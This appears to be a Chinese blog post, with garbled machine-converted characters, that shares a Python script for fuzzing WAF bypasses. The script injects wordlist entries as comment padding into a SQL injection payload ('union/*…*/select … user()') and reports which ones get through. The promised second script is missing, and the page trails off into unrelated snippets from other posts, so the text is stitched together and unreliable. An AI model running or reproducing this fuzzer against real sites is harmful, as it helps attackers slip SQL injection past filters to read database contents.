WAF Bypass FUZZ小指令碼

2022-02-20 21:13:20 字數 2003 閱讀 9435

分享兩個小指令碼,用來waf bypass簡單fuzz的

第乙個:先生成乙個字典,帶入搭建的環境進行fuzz,針對某些軟waf挺好用的,可fuzz出不少姿勢出來,記得先把cc攻擊加入白名單才行哦。。。

#! /usr/bin/env python

# _*_ coding:utf-8 _*_

import urllib

import urllib2

import requests

values={}

f = open('mutou.txt','r')

for line in f.xreadlines():

line =line.strip()

values['id'] = "1 union/*%s*/select/*%s*/1,user()" %(line,line)

data = urllib.urlencode(values)

url = ""

url = url+'?'+data

try:

response = requests.get(url)

result = response.content

#print result

if result.count('root'):

print line

print url

print "***********************************"

else:

pass

#print ".",

except:

print "error"

第二個:

小指令碼 小指令碼記錄本

目錄 1 c 計算程式耗時 2 c 計算程式耗時 基於opencv,需要標頭檔案 3 c 讀寫txt檔案 4 c 中執行終端指令 複製 移動檔案等 5 c 建立資料夾 判斷資料夾是否存在,不存在則建立 6 批量刪除資料夾中0位元組的檔案 shell指令碼 include clock t start ...

shell小指令碼

前言 可能這些指令碼看起來很簡單,很多人都不屑於去寫,但是一切複雜的東西都是由乙個個簡單的東西組合起來的。shell的語法比較怪異,和一般的程式語言有很大的區別,真的要多動手去寫才能學會的 1.要求 1.設定變數file的值為 etc passwd 2.依次向 etc passwd中的每個使用者問好...

python小指令碼

匹配文件內容的關鍵字,並取得該關鍵字所在行所有內容 find the row where need keyword def getcontent tfile,sstr global keyword f1 open tfile readlines for i,j in enumerate f1 if ...